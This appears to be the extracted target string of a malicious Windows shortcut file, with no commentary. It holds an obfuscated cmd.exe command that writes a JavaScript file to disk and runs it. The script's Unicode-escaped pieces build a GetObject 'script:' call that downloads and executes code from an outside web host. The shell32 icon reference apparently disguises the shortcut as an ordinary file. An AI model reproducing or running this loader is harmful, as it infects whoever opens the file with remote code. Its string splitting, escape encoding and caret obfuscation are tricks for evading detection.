wIndOWs\SYsTem32\cONhosT.exe
C:\WIndOWs\SysTEm32x
%COMSpeC%
/V/D/c "Md C:\1UDRSKD\>nul 2>&1&&S^eT JUPL=C:\1UDRSKD\^1UDRSKD.JS&&<nul set/p
a=var PQUN='\u007a\u0034\u0039\u002b\u0044\u007a\u0034\u0039\u002b\u0045\u007a\u0034\u0039\u002b\u0022\u002f\u002f\u0077\u0033\u006f\u0061\u0076\u0072\u002e\u0064\u0075\u0061\u0073\u0064\u0061\u006d\u0061\u006e\u0068\u0061\u0061\u0061\u002e\u0073\u0070\u0061\u0063\u0065\u002f\u003f\u0031\u002f\u0022\u0029\u003b';IDD='\u003a\u0068\u0022\u003b\u0045\u007a\u0034\u0039\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';VDAX='\u0076\u0061\u0072\u0020\u0043\u007a\u0034\u0039\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u007a\u0034\u0039\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';JUPL=VDAX+IDD+PQUN;VMEU=new Function(JUPL);VMEU(); >!JUPL!|C^a^lL !JUPL!||C^a^lL !JUPL!" &
%SystemRoot%\System32\shell32.dll$, 96